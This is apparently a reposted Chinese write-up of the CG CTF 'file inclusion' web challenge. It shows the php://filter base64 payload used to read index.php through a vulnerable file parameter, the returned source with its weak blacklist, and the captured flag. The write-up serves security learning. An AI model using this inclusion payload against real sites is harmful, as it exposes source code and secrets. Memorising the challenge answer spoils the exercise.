CG CTF 文件包含 - 代码天地

CG CTF 文件包含

其他 2020-02-23 19:59:31 阅读次数: 0

点击click me？no，跳转到添加链接描述
在这里插入图片描述
发现file=show.php

肯定是一个包含漏洞了，关于包含漏洞：

尝试了一下file=…/ 和test123.php发现没有用。。想到可以包含index.php来读取他自身的，也错了

翻书发现可以用php内置协议来读取php文件：
http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

可以得到被base64加密的php代码PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=

base64解密在最下面得到

nctf{edulcni_elif_lacol_si_siht}

发布了15 篇原创文章 · 获赞 0 · 访问量 87

私信关注

猜你喜欢

转载自blog.csdn.net/qq_46389295/article/details/104462964

CG CTF 文件包含

CG CTF-Web-文件包含

CG-ctf WP

CG CTF CRYPTO Keyboard

CG CTF CRYPTO easy!

CG-CTF RSAEASY

CG-CTF（6）

CG-CTF（2）

CG CTF GBK Injection

CG CTF MYSQL

CG CTF COOKIE

CG CTF php decode

CG CTF web 上

CG CTF witeup

CG CTF 密码重置

CG CTF pass check

CG CTF 上传绕过

CG CTF 变量覆盖

CG CTF bypass again

CG CTF AAencode

CG CTF 层层递进

CG CTF 签到题

CG-CTF single

CG-CTF 签到

CG-CTF WxyVM

CG-CTF | I wanna play CTF

CG-CTF Crypto WriteUp

CG-CTF | Hello,RE!

CG-CTF | 上传绕过

CG-CTF | SQL Injection

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)